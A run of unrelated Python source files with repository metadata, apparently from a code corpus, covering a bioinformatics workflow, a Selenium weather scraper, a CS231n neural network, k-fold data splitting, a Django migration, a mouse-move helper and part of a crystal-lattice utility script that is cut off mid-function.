                        {'stage': next(ss.get('stage_id') for ss in idr_stages if ss['name'] == 'IDR Rep 2 Self-pseudoreplicates'),
                         'outputField': 'IDR_peaks'}),
                    'pooledpr_peaks': dxpy.dxlink(
                        {'stage': next(ss.get('stage_id') for ss in idr_stages if ss['name'] == 'IDR Pooled Pseudoreplicates'),
                         'outputField': 'IDR_peaks'}),
                    'blacklist': dxpy.dxlink(blacklist.get_id())
                }
            )
            idr_stages.append({'name': 'Final IDR peak calls', 'stage_id': idr_stage_id})

    # Summarize what was built, then optionally launch the workflow.
    if not (args.nomap):
        logging.debug("Mapping stages: %s" %(mapping_superstages))
    else:
        logging.debug("xcor only stages: %s" %(xcor_only_stages))
    if not args.idronly:
        logging.debug("Peak stages: %s" %(spp_stages))
    if args.idr or args.idronly:
        logging.debug("Peaks for IDR stages: %s" %(encode_spp_stages))
        logging.debug("IDR stages: %s" %(idr_stages))

    if args.yes:
        job_id = workflow.run({}, delay_workspace_destruction=True)
        logging.info("Running as job %s" %(job_id))

if __name__ == '__main__':
    main()
| [
"jseth@stanford.edu"
] | jseth@stanford.edu |
f94f70300297d6540a203b03e0a808f40fb78e99 | 3cedc7c1519d3b013aad9ec4e6a6ee7834da7589 | /selenium_code/z_practise/001/sa2.py | f978ca4ea1b40e7eda5051133e473ae0a9999596 | [] | no_license | hzrg/songqin_course | 53437100669ee93d2ac5ecae5de938b1a4007d7f | 05e422ce34a42fd6d3819722a19252f8005e79ed | refs/heads/master | 2022-02-09T13:27:59.871400 | 2019-06-13T06:08:45 | 2019-06-13T06:08:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,550 | py | # coding:utf8
from selenium import webdriver
# Path to the browser driver executable.
executable_path = r"d:\tools\webdrivers\chromedriver.exe"
# Use the Chrome driver specifically.
# When this line runs, Selenium launches the chromedriver program found at the path above.
driver = webdriver.Chrome(executable_path)
# ------------------------
driver.get('http://www.weather.com.cn/html/province/jiangsu.shtml')
# Inspecting the HTML shows the temperature info lives in <dl> children of the "forecastID" element.
info = driver.find_element_by_id("forecastID")
# Then fetch all <dl> child elements of the forecastID element.
dls = info.find_elements_by_tag_name('dl')
# Save each city name and its temperature into the list `citys`.
citys = []
for dl in dls:
    # print dl.get_attribute('innerHTML')
    name = dl.find_element_by_tag_name('dt').text
    # The high/low temperature positions vary; the position decides whether it is in <span> or <b>.
    ltemp = dl.find_element_by_tag_name('b').text
    ltemp = int(ltemp.replace(u'℃',''))
    print(name, ltemp)
    citys.append([name, ltemp])
lowest = 100
lowestCitys = [] # list of cities sharing the lowest temperature
for one in citys:
    curcity = one[0]
    ltemp = one[1]
    curlowweather = ltemp
    # Found a city with a lower temperature: reset the list.
    if curlowweather<lowest:
        lowest = curlowweather
        lowestCitys = [curcity]
    # Temperature equals the current lowest: append to the list.
    elif curlowweather ==lowest:
        lowestCitys.append(curcity)
print('温度最低为%s, 城市有%s' % (lowest, ','.join(lowestCitys)))
# ------------------------
driver.quit() | [
"1174497735@qq.com"
] | 1174497735@qq.com |
f9517abbc68b8dd5fa38af5011ed894fead69e7b | c047005bd92cdb26b7aac56a0592d705fd3a89f4 | /Assignment_1/assignment1/cs231n/classifiers/neural_net.py | 8fe09672517395d4ae43656ff7b151c3595bcbf2 | [] | no_license | Rowan23/Stanford_cnn | e9ef6f568afd42a1e7cc21752f42ac1463e53133 | 9411e98f01e449fb7478c0e346231ee997f62eb6 | refs/heads/master | 2021-05-05T13:07:54.436546 | 2018-01-22T07:10:24 | 2018-01-22T07:10:24 | 118,317,294 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,484 | py | from __future__ import print_function
import numpy as np
import matplotlib.pyplot as plt
from past.builtins import xrange
class TwoLayerNet(object):
  """
  A two-layer fully-connected neural network. The net has an input dimension of
  N, a hidden layer dimension of H, and performs classification over C classes.
  We train the network with a softmax loss function and L2 regularization on the
  weight matrices. The network uses a ReLU nonlinearity after the first fully
  connected layer.

  In other words, the network has the following architecture:

  input - fully connected layer - ReLU - fully connected layer - softmax

  The outputs of the second fully-connected layer are the scores for each class.
  """

  def __init__(self, input_size, hidden_size, output_size, std=1e-4):
    """
    Initialize the model. Weights are initialized to small random values and
    biases are initialized to zero. Weights and biases are stored in the
    variable self.params, which is a dictionary with the following keys:

    W1: First layer weights; has shape (D, H)
    b1: First layer biases; has shape (H,)
    W2: Second layer weights; has shape (H, C)
    b2: Second layer biases; has shape (C,)

    Inputs:
    - input_size: The dimension D of the input data.
    - hidden_size: The number of neurons H in the hidden layer.
    - output_size: The number of classes C.
    """
    self.params = {}
    self.params['W1'] = std * np.random.randn(input_size, hidden_size)
    self.params['b1'] = np.zeros(hidden_size)
    self.params['W2'] = std * np.random.randn(hidden_size, output_size)
    self.params['b2'] = np.zeros(output_size)

  def loss(self, X, y=None, reg=0.0):
    """
    Compute the loss and gradients for a two layer fully connected neural
    network.

    Inputs:
    - X: Input data of shape (N, D). Each X[i] is a training sample.
    - y: Vector of training labels. y[i] is the label for X[i], and each y[i] is
      an integer in the range 0 <= y[i] < C. This parameter is optional; if it
      is not passed then we only return scores, and if it is passed then we
      instead return the loss and gradients.
    - reg: Regularization strength.

    Returns:
    If y is None, return a matrix scores of shape (N, C) where scores[i, c] is
    the score for class c on input X[i].

    If y is not None, instead return a tuple of:
    - loss: Loss (data loss and regularization loss) for this batch of training
      samples.
    - grads: Dictionary mapping parameter names to gradients of those parameters
      with respect to the loss function; has the same keys as self.params.
    """
    # Unpack variables from the params dictionary
    W1, b1 = self.params['W1'], self.params['b1']
    W2, b2 = self.params['W2'], self.params['b2']
    N, D = X.shape

    # Forward pass: affine -> ReLU -> affine.
    h = np.maximum(X.dot(W1) + b1, 0)
    scores = h.dot(W2) + b2

    # If the targets are not given then jump out, we're done
    if y is None:
      return scores

    # Softmax loss. Shift scores by their row-wise maximum before
    # exponentiating: the shift cancels in the softmax but prevents
    # overflow of exp() for large scores (numerical stability fix).
    shifted = scores - np.max(scores, axis=1, keepdims=True)
    expScores = np.exp(shifted)
    softmax = expScores / np.sum(expScores, axis=1, keepdims=True)
    loss = np.sum(-np.log(softmax[np.arange(N), y])) / N
    # L2 regularization on the weight matrices (biases are not regularized).
    loss += reg * (np.sum(W1 * W1) + np.sum(W2 * W2))

    # Backward pass: compute gradients.
    grads = {}
    # d(loss)/d(scores): softmax probabilities minus one-hot targets, / N.
    dScores = softmax
    dScores[np.arange(N), y] -= 1
    dScores /= N
    grads['b2'] = np.ones(N).dot(dScores)
    grads['W2'] = np.transpose(h).dot(dScores) + reg * 2 * W2
    dh = dScores.dot(np.transpose(W2))
    # ReLU gate: gradient flows only where the forward activation was > 0.
    dIntermediate = dh * (h > 0)
    grads['b1'] = np.ones(N).dot(dIntermediate)
    grads['W1'] = np.transpose(X).dot(dIntermediate) + reg * 2 * W1

    return loss, grads

  def train(self, X, y, X_val, y_val,
            learning_rate=1e-3, learning_rate_decay=0.95,
            reg=5e-6, num_iters=100,
            batch_size=200, verbose=False):
    """
    Train this neural network using stochastic gradient descent.

    Inputs:
    - X: A numpy array of shape (N, D) giving training data.
    - y: A numpy array f shape (N,) giving training labels; y[i] = c means that
      X[i] has label c, where 0 <= c < C.
    - X_val: A numpy array of shape (N_val, D) giving validation data.
    - y_val: A numpy array of shape (N_val,) giving validation labels.
    - learning_rate: Scalar giving learning rate for optimization.
    - learning_rate_decay: Scalar giving factor used to decay the learning rate
      after each epoch.
    - reg: Scalar giving regularization strength.
    - num_iters: Number of steps to take when optimizing.
    - batch_size: Number of training examples to use per step.
    - verbose: boolean; if true print progress during optimization.
    """
    num_train = X.shape[0]
    # Integer division is required here: under Python 3 the original float
    # division made `it % iterations_per_epoch` almost never zero, so the
    # learning rate never decayed and accuracies were recorded only once.
    iterations_per_epoch = max(num_train // batch_size, 1)

    # Use SGD to optimize the parameters in self.model
    loss_history = []
    train_acc_history = []
    val_acc_history = []

    for it in range(num_iters):
      # Sample a random minibatch (with replacement) of training examples.
      randIds = np.random.choice(num_train, batch_size)
      X_batch = X[randIds]
      y_batch = y[randIds]

      # Compute loss and gradients using the current minibatch
      loss, grads = self.loss(X_batch, y=y_batch, reg=reg)
      loss_history.append(loss)

      # Vanilla SGD update on every parameter.
      for param in self.params:
        self.params[param] -= learning_rate * grads[param]

      if verbose and it % 100 == 0:
        print('iteration %d / %d: loss %f' % (it, num_iters, loss))

      # Every epoch, check train and val accuracy and decay learning rate.
      if it % iterations_per_epoch == 0:
        # Check accuracy
        train_acc = (self.predict(X_batch) == y_batch).mean()
        val_acc = (self.predict(X_val) == y_val).mean()
        train_acc_history.append(train_acc)
        val_acc_history.append(val_acc)

        # Decay learning rate
        learning_rate *= learning_rate_decay

    return {
      'loss_history': loss_history,
      'train_acc_history': train_acc_history,
      'val_acc_history': val_acc_history,
    }

  def predict(self, X):
    """
    Use the trained weights of this two-layer network to predict labels for
    data points. For each data point we predict scores for each of the C
    classes, and assign each data point to the class with the highest score.

    Inputs:
    - X: A numpy array of shape (N, D) giving N D-dimensional data points to
      classify.

    Returns:
    - y_pred: A numpy array of shape (N,) giving predicted labels for each of
      the elements of X. For all i, y_pred[i] = c means that X[i] is predicted
      to have class c, where 0 <= c < C.
    """
    # loss(X) with y=None returns the raw class scores; pick the argmax.
    y_pred = np.argmax(self.loss(X), axis=1)
    return y_pred
| [
"rowanjlange@gmail.com"
] | rowanjlange@gmail.com |
8d989be35b4a12f5e33dfb1c5f24584eb840739b | 5ae0724a33861822786d1101d84ac607d04dde59 | /mod2.py | 1d6191ffcaaddc1c9b8d3919409fd4e9491c644f | [] | no_license | RahulKB31/ineuron_class | 9ea710eabc4d1e126347c5530093e914a823da70 | 1e093aa747f6e9406e46706181a8d8ab1c2daa48 | refs/heads/main | 2023-06-20T21:06:08.550787 | 2021-07-30T11:35:27 | 2021-07-30T11:35:27 | 379,680,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | def fn21():
print('this is my fn21 mod2')
def fn22():
print('this is my fn22 mod2')
def fn23():
print('this is my fn23 mod3')
| [
"noreply@github.com"
] | noreply@github.com |
eb9e884e967f1375f7635f675f77cb4c6d5d3b31 | 935a5dbec1e56a615f9d426c4cd8f31ed709ad45 | /data/generate_dev_polarity.py | 1111c54fbf96d16e360367468d4ac9fd50091ee9 | [] | no_license | PandasCute/BDCI_Car_2018 | 1f94a858f114506335ef3e3ebb48256035ed83ba | 1d8947fea362103ee6ca46133bfad3536fd5301f | refs/heads/master | 2020-04-09T04:04:42.729789 | 2018-12-05T03:58:13 | 2018-12-05T03:58:13 | 160,009,414 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,325 | py | import codecs
import numpy as np
seed = 1024
def kfold_split(length, k=5):
np.random.seed(seed)
index_list = np.random.permutation(length)
l = length // k
folds = []
for i in range(k):
test_idx = np.zeros(length, dtype=bool)
test_idx[i*l:(i+1)*l] = True
folds.append((index_list[~test_idx], index_list[test_idx]))
return folds
def load_abp_raw(filename): # aspect_based polarity
fo = codecs.open(filename, encoding='utf-8').readlines()
return fo
def splits(fo, train_index, dev_index):
train_texts, train_labels, train_aspects, test_texts, test_labels, test_aspects = [], [], [], [], [], []
for i in train_index:
line = fo[i]
splits = line.strip('\n').split('\t')
# text = text.lower()
text = splits[0].strip()
for pair in splits[1:]:
aspect = pair.split('#')[0]
p = pair.split('#')[1]
train_texts.append(text)
train_labels.append(p)
train_aspects.append(aspect)
for i in dev_index:
line = fo[i]
splits = line.strip('\n').split('\t')
# text = text.lower()
text = splits[0].strip()
for pair in splits[1:]:
aspect = pair.split('#')[0]
p = pair.split('#')[1]
test_texts.append(text)
test_labels.append(p)
test_aspects.append(aspect)
return train_texts, train_labels, train_aspects, test_texts, test_labels, test_aspects
def count_instance(fo):
count = 0
index_list = []
for line in fo:
current_index = []
splits = line.strip('\n').split('\t')
for p in splits[1:]:
assert '#' in p
current_index.append(count)
count += 1
index_list.append(current_index)
return count, index_list
if __name__ == '__main__':
f_train = 'train.txt'
fo = load_abp_raw(filename=f_train)
n_train, sentence2instance = count_instance(fo)
for i, (train_index, test_index) in enumerate(kfold_split(len(fo), 5)):
train_out = codecs.open("polarity_ensemble_online/%d/train.tsv" % (i+1), 'w', encoding='utf-8')
dev_out = codecs.open("polarity_ensemble_online/%d/dev.tsv" % (i+1), 'w', encoding='utf-8')
dev_index = codecs.open("polarity_ensemble_online/%d/dev.ind" % (i + 1), 'w', encoding='utf-8')
train_out.write('text\taspect\tlabels\n')
dev_out.write('text\taspect\tlabels\n')
train_texts, train_labels, train_aspects, test_texts, test_labels, test_aspects = splits(fo, train_index,
test_index)
test_i_index = [i_index for sentence_index in test_index for i_index in sentence2instance[sentence_index]]
for t, l, a in zip(train_texts, train_labels, train_aspects):
# print(t, l, a)
train_out.write(t + '\t' + a + '\t' + l + '\n')
print(len(test_i_index))
print(len(test_texts))
for t, l, ind, a in zip(test_texts, test_labels, test_i_index, test_aspects):
# print(t, l, a)
dev_out.write(t + '\t' + a + '\t' + l + '\n')
dev_index.write(str(ind) + '\n')
train_out.close()
dev_out.close()
dev_index.close()
| [
"fanzf@nlp.nju.edu.cn"
] | fanzf@nlp.nju.edu.cn |
0d5a4132c1a3c779a764137edb3a3e33431d8662 | fa89836a6759151896a07650747462b8cda40610 | /mse/about/migrations/0010_event_ordinal.py | 60b846d5a892fc107b9a4bef92acd71c0bed9132 | [] | no_license | DigitalGizmo/mse21 | 334813bfebec9b78f0541744e54f218f9cc6936b | 89f1c0f9c05cefaaa8c703732ee4e4642aecd3c9 | refs/heads/master | 2023-07-09T13:29:13.903900 | 2018-03-26T19:26:09 | 2018-03-26T19:26:09 | 126,878,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('about', '0009_single'),
]
operations = [
migrations.AddField(
model_name='event',
name='ordinal',
field=models.IntegerField(verbose_name='Order in Menu', default=99),
),
]
| [
"donpublic@digitalgizmo.com"
] | donpublic@digitalgizmo.com |
7d26b9e1f9a52eb6d0b65a86bff16fcf9aeb474d | 5b7456802cdfaf5edfaf7f1746691390ddc4d752 | /smh_eyetracking/interfaces/mouse_behavior/move_to.py | 91739405b4eadbd52510cb2b4128153d69d8b693 | [] | no_license | next-samuelmunoz/hci-eye_tracking-workshop | 084b1940e044354168b03cb032853784a6085b7d | 62fe7a3691ba9d089d34cbe4944266898500fd23 | refs/heads/master | 2021-08-08T14:10:54.424855 | 2017-11-10T12:59:22 | 2017-11-10T12:59:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | # -*- coding: utf-8 -*-
""" Just move the mouse.
"""
import numpy as np
import pyautogui
class MoveTo():
def __init__(self, threshold_radius, duration=0.2):
self.threshold_radius = threshold_radius
self.duration = duration
self.mouse_pos = np.array([0,0])
def action(self, mouse_pos):
if np.linalg.norm(mouse_pos-self.mouse_pos)>self.threshold_radius:
x,y = mouse_pos
pyautogui.moveTo(x, y, duration=self.duration)
self.mouse_pos = mouse_pos
| [
"samuel.munoz@beeva.com"
] | samuel.munoz@beeva.com |
5b26ad7dc37b97e969b5062c600ab287b8c20353 | 6d85a8c2842ccf22928c235a159f114ce0821bd6 | /aux_src/makeStr.py | 34eecd5ffc10ce1ed2aa362cec0ef7625448f88c | [
"MIT"
] | permissive | mkhorton/enumlib | 60b6e6f7d78c667852169ebcd7cd2628a7af431e | 3cf85cb230b170d37ddb6e24acb231b8736eb9fb | refs/heads/master | 2021-01-20T22:11:32.110540 | 2017-08-29T17:28:31 | 2017-08-29T17:28:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37,859 | py | """This scripts produces the VASP style POSCAR."""
from __future__ import print_function
from termcolor import cprint
import warnings
# The dictionary of all the elements on the periodic table
all_elements ={"H": 3.75,"He": 3.57,"Li": 3.49,"Be": 2.29,"B": 8.73,"C": 3.57,"N": 4.039,
"O": 6.83,"Ne": 4.43,"Na": 4.23,"Mg": 3.21,"Al": 4.05,"Si": 5.43,"P": 7.17,
"S": 10.47,"Cl": 6.24,"Ar": 5.26,"K": 5.23,"Ca": 5.58,"Sc": 3.31,"Ti": 2.95,
"V": 3.02,"Cr": 2.88,"Mn": 8.89,"Fe": 2.87,"Co": 2.51,"Ni": 3.52,"Cu": 3.61,
"Zn": 2.66,"Ga": 4.51,"Ge": 5.66,"As": 4.13,"Se": 4.36,"Br": 6.67,"Kr": 5.72,
"Rb": 5.59,"Sr": 6.08,"Y": 3.65,"Zr": 3.23,"Nb": 3.3,"Mo": 3.15,"Tc": 2.74,
"Ru": 2.7,"Rh": 3.8,"Pd": 3.89,"Ag": 4.09,"Cd": 2.98,"In": 4.59,"Sn": 5.82,
"Sb": 4.51,"Te": 4.45,"I": 7.27,"Xe": 6.2,"Cs": 6.05,"Ba": 5.02,"Hf": 3.2,
"Ta": 3.31,"W": 3.16,"Re": 2.76,"Os": 2.64,"Ir": 3.84,"Pt": 3.92,"Au": 4.08,
"Hg": 2.99,"Tl": 3.46,"Pb": 4.95,"Bi": 4.75}
verbosity = None
"""The verbosity level of messages being printed by the module."""
quiet = None
"""When in quiet mode, no text is ever printed to terminal unless its
verbosity level is explicitly specified.
"""
cenum = {
"cerrs": 0,
"cwarn": 1,
"cinfo": 2,
"cgens": 3,
"cstds": 4,
"cokay": 5
}
"""Dict of the various colors available for coloring specific
lines in the arb().
"""
icols = ["red", "yellow", "cyan", "blue", "white", "green"]
nocolor = False
"""When true, the colored outputs all use the regular print() instead
so that the stdout looks ordinary.
"""
def _common_parser():
"""Returns a parser with common command-line options for all the scripts
in the fortpy suite.
"""
import argparse
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument("-examples", action="store_true",
help="See detailed help and examples for this script.")
parser.add_argument("-verbose", action="store_true",
help="See verbose output as the script runs.")
parser.add_argument('-action', nargs=1, choices=['save','print'], default='print',
help="Specify what to do with the output (print or save)")
parser.add_argument("-debug", action="store_true",
help="Print verbose calculation information for debugging.")
return parser
bparser = _common_parser()
testmode = False
"""bool: when True, the package is operating in unit test mode, which changes
how plotting is handled.
"""
def deprecated(func):
'''This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emitted
when the function is used.'''
def new_func(*args, **kwargs):
warnings.warn("Call to deprecated function {}.".format(func.__name__),
category=DeprecationWarning)
return func(*args, **kwargs)
new_func.__name__ = func.__name__
new_func.__doc__ = func.__doc__
new_func.__dict__.update(func.__dict__)
return new_func
def exhandler(function, parser):
"""If -examples was specified in 'args', the specified function
is called and the application exits.
:arg function: the function that prints the examples.
:arg parser: the initialized instance of the parser that has the
additional, script-specific parameters.
"""
args = vars(bparser.parse_known_args()[0])
if args["examples"]:
function()
return
if args["verbose"]:
from liveserial.msg import set_verbosity
set_verbosity(args["verbose"])
args.update(vars(parser.parse_known_args()[0]))
return args
def set_testmode(testing):
"""Sets the package testing mode.
"""
global testmode
testmode = testing
def RepresentsInt(s):
"""Determines if a string could be an int.
:arg s: The string to be tested.
"""
try:
int(s)
return True
except ValueError:
return False
def RepresentsFloat(s):
"""Determines if a string could be an float.
:arg s: The string to be tested.
"""
try:
float(s)
return True
except ValueError:
return False
def example(script, explain, contents, requirements, output, outputfmt, details):
"""Prints the example help for the script."""
blank()
cprint(script.upper(), "yellow")
cprint(''.join(["=" for i in range(70)]) + '\n', "yellow")
cprint("DETAILS", "blue")
std(explain + '\n')
cprint(requirements, "red")
cprint(output, "green")
blank()
if details != "":
std(details)
blank()
cprint("OUTPUT FORMAT", "blue")
std(outputfmt)
blank()
cprint("EXAMPLES", "blue")
for i in range(len(contents)):
pre, code, post = contents[i]
std("{}) {}".format(i + 1, pre))
cprint(" " + code, "cyan")
if post != "":
std('\n' + post)
blank()
def printer(text, color=None, **kwargs):
"""Prints using color or standard print() depending on the value
of 'nocolor'.
"""
if nocolor:
# import sys
# sys.stdout.write(text + "" if ("end" in kwargs and kwargs["end"] == "") else '\n')
# sys.stdout.flush()
print(text, **kwargs)
else:
if color is None:
cprint(text, **kwargs)
else:
cprint(text, color, **kwargs)
def arb(text, cols, split):
"""Prints a line of text in arbitrary colors specified by the numeric
values contained in msg.cenum dictionary.
"""
stext = text if text[-1] != split else text[0:-1]
words = stext.split(split)
for i, word in enumerate(words):
col = icols[cols[i]]
printer(word, col, end="")
if i < len(words)-1:
printer(split, end="")
else:
printer(split)
def set_verbosity(level):
"""Sets the modules message verbosity level for *all* messages printed.
:arg level: a positive integer (>0); higher levels including more detail.
"""
global verbosity
verbosity = level
def set_quiet(is_quiet):
"""Sets whether the messaging system is running in quiet mode. Quiet mode
only prints messages with explicit verbosity specified. If verbosity==None
and quiet==True, any message with level >= 0 is printed.
"""
global quiet
quiet = is_quiet
def will_print(level=1):
"""Returns True if the current global status of messaging would print a
message using any of the printing functions in this module.
"""
if level == 1:
#We only affect printability using the quiet setting.
return quiet is None or quiet == False
else:
return ((isinstance(verbosity, int) and level <= verbosity) or
(isinstance(verbosity, bool) and verbosity == True))
def warn(msg, level=0, prefix=True):
"""Prints the specified message as a warning; prepends "WARNING" to
the message, so that can be left off.
"""
if will_print(level):
printer(("WARNING: " if prefix else "") + msg, "yellow")
def err(msg, level=-1, prefix=True):
"""Prints the specified message as an error; prepends "ERROR" to
the message, so that can be left off.
"""
if will_print(level) or verbosity is None:
printer(("ERROR: " if prefix else "") + msg, "red")
def info(msg, level=1):
"""Prints the specified message as information."""
if will_print(level):
printer(msg, "cyan")
def okay(msg, level=1):
"""Prints the specified message as textual progress update."""
if will_print(level):
printer(msg, "green")
def gen(msg, level=1):
"""Prints the message as generic output to terminal."""
if will_print(level):
printer(msg, "blue")
def blank(n=1, level=2):
"""Prints a blank line to the terminal."""
if will_print(level):
for i in range(n):
print("")
def std(msg, level=1):
"""Prints using the standard print() function."""
if will_print(level):
print(msg)
def _gaussian_reduce_two_vectors(U,V,eps):
"""This routine takes two vectors (in three-space) and reduces them to
form a shortest set (Minkowski reduced). The idea is to subtract
multiples of U from V so that the new V is as close to the origin
as any lattice point along the line that passes through U in the
direction of V. The process is repeated until the new vector isn't
shorter than the other. It's pretty obvious if you do an example
by hand. Also see 3.1 of Lecture notes in computer science, ISSN
0302-974, ANTS - VI: algorithmic number theory, 2004, vol. 3076,
pp. 338-357 ISBN 3-540-22156-5. Fixes made Apr 2012 GLWH (not sure
if they made a practical difference though)
:arg U: a vector
:arg V: a vector
:arg eps: finite precision tolerance
"""
from numpy.linalg import norm
from numpy import dot
it = 0
if norm(U) > (norm(V) - eps):
# Make sure that the {U,V} are listed in ascending order; ||U||<||V||
temp = U
U = V
V = temp # Keep V as the longest vector
done = False
it = 1
while not done:
if it > 10: # pragma: no cover
err("gaussian_reduce_two_vectors failed to converge in 10 iterations")
exit()
R = [V[i]-int(round(dot(U,V)/dot(U,U)+1E-10))*U[i] for i in range(3)] #Shorten V as much as possible
V = U # Swap U and V (so U remains the shortest)
U = R
if norm(U) >= (norm(V) - eps):
done = True
it += 1
# Make sure that the {U,V} are listed in ascending order on exit; ||U||<||V||
temp = U
U = V
V = temp
return U, V
def _minkowski_conditions_check(basis,eps):
"""This function checks the minkowski conditions for a 3D lattice
basis.
:arg basis: The atomic basis vectors
:arg eps: finitie precision tolerance
"""
from numpy import linalg
b1 = basis[0]
b2 = basis[1]
b3 = basis[2]
minkowski_check = True
if linalg.norm(b1) > (linalg.norm(b2) + eps):
minkowski_check = False
err("Minkowski_condition 1 failed: b1 > b2")
if linalg.norm(b2) > (linalg.norm(b3) + eps):
minkowski_check = False
err("Minkowski_condition 2 failed: b2 > b3")
if linalg.norm(b2) > (linalg.norm([b1[i]+b2[i] for i in range(len(b1))])+eps):
minkowski_check = False
err("Minkowski_condition 3 failed: b2 > b1+b2")
if linalg.norm(b2) > (linalg.norm([b1[i]-b2[i] for i in range(len(b1))])+eps):
minkowski_check = False
err("Minkowski_condition 4 failed: b2 > b1-b2")
if linalg.norm(b3) > (linalg.norm([b1[i]+b3[i] for i in range(len(b1))])+eps):
minkowski_check = False
err("Minkowski_condition 5 failed: b3 > b1+b3")
if linalg.norm(b3) > (linalg.norm([b3[i]-b1[i] for i in range(len(b1))])+eps):
minkowski_check = False
err("Minkowski_condition 6 failed: b3 > b3-b1")
if linalg.norm(b3) > (linalg.norm([b2[i]+b3[i] for i in range(len(b2))])+eps):
minkowski_check = False
err("Minkowski_condition 7 failed: b3 > b2+b3")
if linalg.norm(b3) > (linalg.norm([b3[i]-b2[i] for i in range(len(b2))])+eps):
minkowski_check = False
err("Minkowski_condition 8 failed: b3 > b3-b2")
if linalg.norm(b3) > (linalg.norm([b1[i]+b2[i]+b3[i] for i in range(len(b2))])+eps):
minkowski_check = False
err("Minkowski_condition 9 failed: b3 > b1+b2+b3")
if linalg.norm(b3) > (linalg.norm([b1[i]-b2[i]+b3[i] for i in range(len(b2))])+eps):
minkowski_check = False
err("Minkowski_condition 10 failed: b3 > b1-b2+b3")
if linalg.norm(b3) > (linalg.norm([b1[i]+b2[i]-b3[i] for i in range(len(b2))])+eps):
minkowski_check = False
err("Minkowski_condition 11 failed: b3 > b1+b2-b3")
if linalg.norm(b3) > (linalg.norm([b1[i]-b2[i]-b3[i] for i in range(len(b2))])+eps):
minkowski_check = False
err("Minkowski_condition 12 failed: b3 > b1-b2-b3")
return minkowski_check
def _reduce_C_in_ABC(A,B,C,eps):
"""This routine takes three vectors, A,B,C, defining a lattice, and
reduces the last one so that it is as close as possible to the
origin while remaining in an affine plane, which is parallel to
the A-B plane but which passes through the end of the C
vector. See Lecture notes in computer science, ISSN 0302-974, ANTS
- VI : algorithmic number theory, 2004, vol. 3076, pp. 338-357
ISBN 3-540-22156-5
:arg A: a vector
:arg B: a vector
:arg C: a vector
:arg eps: finite precision tolerance
"""
from numpy import cross, linalg, dot, allclose, matmul, array
from copy import deepcopy
from math import floor
oldABC = deepcopy([A,B,C])
# Use Gaussian reduction to reduce the A,B 2D basis so that it is
# itself Minkowski reduced. If this is done, then the closest
# lattice point (in A,B plane) to the projection of C (into the
# A,B plane) is guaranteed to be one of the corners of the unit
# cell enclosing the projection of C
(A,B) = _gaussian_reduce_two_vectors(A,B,eps)
# First thing to do is find the (real, not lattice) point in the
# affine plane A,B + C that is nearest the origin. Call this T.
cpdAB = [i/linalg.norm(cross(A,B)) for i in cross(A,B)]
T = [C[i] - cpdAB[i]*dot(C,cpdAB) for i in range(3)]
if not allclose(dot(T,cross(A,B)),0,atol=eps,rtol=eps): #pragma: no cover
err("{} Projection of C into A,B plane failed".format(str(dot(T,cross(A,B)))))
# Now find the four points of the A,B lattice, in the affine
# plane, that enclose the point T
ABC = [A,B,C]
ABCinv = linalg.inv(ABC)
LC = [int(floor(i +eps)) for i in matmul(T,ABCinv).tolist()]
# Compute the distance from T to each of the four corners of the cell and pick
# the one that is the closest.
corners = array([[0,0,0],[1,0,0],[0,1,0],[1,1,0]])
dist = []
for i in range(0,4):
temp1 = corners[i] + array(LC)
temp2 = array(T) -matmul((corners[i] + array(LC)),ABC)
dist.append(linalg.norm(array(T) -matmul((corners[i] + array(LC)),ABC)))
idx = dist.index(min(dist))
if idx == 0:
temp1 = [corners[0][i] + LC[i] for i in range(3)]
temp2 = matmul(temp1,ABC).tolist()
C = [C[i] - temp2[i] for i in range(len(C))]
elif idx == 1:
temp1 = [corners[1][i] + LC[i] for i in range(3)]
temp2 = matmul(temp1,ABC).tolist()
C = [C[i] - temp2[i] for i in range(len(C))]
elif idx == 2:
temp1 = [corners[2][i] + LC[i] for i in range(3)]
temp2 = matmul(temp1,ABC).tolist()
C = [C[i] - temp2[i] for i in range(len(C))]
elif idx == 3:
temp1 = [corners[3][i] + LC[i] for i in range(3)]
temp2 = matmul(temp1,ABC).tolist()
C = [C[i] - temp2[i] for i in range(len(C))]
else: #pragma: no cover
err("Case failed in reduce_C_in_ABC"
"Lattice coordinates in the A,B plane: ".format(' '.join([str(i) for i in LC])))
ABC = [A,B,C]
ABCinv = linalg.inv(ABC)
temp = matmul(list(map(list,zip(*ABCinv))),list(map(list,zip(*oldABC)))).tolist()
for i in range(3):
for j in range(3):
if abs(temp[i][j] - int(round(temp[i][j]))) > eps: #pragma: no cover
err("Lattice was not preserved in reduce_C_in_ABC")
exit()
return A, B, C
def _get_lattice_parameter(elements, concentrations, default_title):
"""Finds the lattice parameters for the provided atomic species using Vagars law.
:arg elements: A dictionary of elements in the system and their concentrations.
:arg title: The default system title.
:arg concentrations: The concentrations of each element.
"""
if elements == None:
lat_param = 1.0
title = default_title
else:
if len(elements) != len(concentrations):
raise ValueError("You have provided {} element names when {} elements are present "
"in the system. Please provide the correct number of elements."
.format(len(elements),len(concentrations)))
else:
title = ""
lat_param = 0
for i in range(len(elements)):
lat_param += concentrations[i]*all_elements[elements[i]]
if concentrations[i] > 0:
title += " {} ".format(elements[i])
lat_param = float(lat_param) / sum(concentrations)
title = "{0} {1}\n".format(default_title.strip(),title)
return lat_param, title
def _cartesian2direct(sLV,aBas, eps):
"""This routine takes three lattice vectors and a list of atomic basis
vector in Cartesian coordinates and converts them to direct
("lattice") coordinates.
:arg sLV: Superlattice vectors (Cartesian coordinates)
:arg aBas: Atomic positions (cartesian coordinates first, then direct)
:arg eps: Finite precision tolerance.
"""
from numpy import linalg, matmul, array
nAt = len(aBas)
sLVinv = linalg.inv(sLV)
# Convert aBas to DIRECT COORDINATES
for iAt in range(nAt):
aBas[iAt] = matmul(aBas[iAt],sLVinv) # Put positions into
# "direct" coordinates This keeps the atomic coordinates inside
# the first unit cell--- not necessary but aesthetically
# pleasing.
while any(aBas[iAt] >= (1.0-eps)) or any(aBas[iAt] < (0.0-eps)):
